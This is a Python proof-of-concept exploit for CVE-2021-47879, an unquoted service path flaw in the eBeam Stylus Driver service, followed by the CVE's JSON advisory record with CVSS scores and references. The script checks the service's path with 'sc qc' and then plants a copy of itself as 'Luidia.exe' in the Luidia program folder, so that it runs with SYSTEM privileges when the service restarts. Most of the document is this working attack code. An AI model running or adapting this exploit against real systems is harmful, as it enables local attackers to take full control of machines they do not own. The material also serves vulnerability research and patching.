CVE-2021-47879

# CVE-2021-47879 PoC - Unquoted Service Path Privilege Escalation # Target: eBeam Stylus Driver Service # This PoC demonstrates the unquoted service path vulnerability import os import sys import subprocess import shutil def check_vulnerability(): """Check if target service is vulnerable""" try: # Query service configuration using sc command result = subprocess.run( ['sc', 'qc', 'eBeam Stylus Driver'], capture_output=True, text=True ) if 'BINARY_PATH_NAME' in result.stdout: # Extract the path (simplified parsing) lines = result.stdout.split('\n') for line in lines: if 'BINARY_PATH_NAME' in line: print(f'[*] Found service path: {line.strip()}') # Check if path contains spaces and is not quoted if ' ' in line and '"' not in line: print('[+] VULNERABLE: Path contains spaces without quotes') return True else: print('[-] NOT VULNERABLE or path is quoted') return False return False except Exception as e: print(f'[-] Error checking service: {e}') return False def exploit(): """Exploit the unquoted service path vulnerability""" # Malicious executable name (depends on the unquoted path) # For example, if path is C:\Program Files (x86)\Luidia\eBeam Stylus Driver\service.exe # We can place malicious.exe in C:\Program Files (x86)\Luidia\ malicious_exe = 'Luidia.exe' # or 'eBeam.exe' depending on the path target_path = r'C:\Program Files (x86)\Luidia' malicious_path = os.path.join(target_path, malicious_exe) # Create the directory if it doesn't exist if not os.path.exists(target_path): os.makedirs(target_path) # In a real attack, this would be a malicious executable # For demonstration, we create a benign file print(f'[*] Creating malicious executable at: {malicious_path}') # Copy current executable or create a placeholder if hasattr(sys, 'frozen'): malicious_code = sys.executable else: malicious_code = sys.argv[0] try: shutil.copy(malicious_code, malicious_path) print(f'[+] Malicious executable placed successfully') print(f'[*] When the service restarts, it may execute {malicious_exe} with SYSTEM privileges') print('[*] Note: Service restart required for exploitation') except Exception as e: print(f'[-] Failed to place malicious executable: {e}') if __name__ == '__main__': print('=== CVE-2021-47879 Unquoted Service Path PoC ===') print('Target: eBeam Interactive Suite - eBeam Stylus Driver') print() if check_vulnerability(): print('\n[*] Proceeding with exploitation...') exploit() else: print('\n[-] Target is not vulnerable or service not found')

{"cve": {"id": "CVE-2021-47879", "sourceIdentifier": "[email protected]", "published": "2026-01-21T18:16:22.093", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "eBeam Interactive Suite 3.6 contains an unquoted service path vulnerability in the eBeam Stylus Driver service that allows local users to potentially execute code with elevated privileges. Attackers can exploit the unquoted path in C:\\Program Files (x86)\\Luidia\\eBeam Stylus Driver\\ to inject malicious executables that would run with LocalSystem permissions."}, {"lang": "es", "value": "eBeam Interactive Suite 3.6 contiene una vulnerabilidad de ruta de servicio sin comillas en el servicio eBeam Stylus Driver que permite a los usuarios locales ejecutar código potencialmente con privilegios elevados. Los atacantes pueden explotar la ruta sin comillas en C:\\Program Files (x86)\\Luidia\\eBeam Stylus Driver\\ para inyectar ejecutables maliciosos que se ejecutarían con permisos de LocalSystem."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "http://esvc000385.wic045u.server-web.com/Downloads/eBeam/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49648", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/ebeam-interactive-suite-ebeam-stylus-driver-unquoted-service-path", "source": "[email protected]"}]}}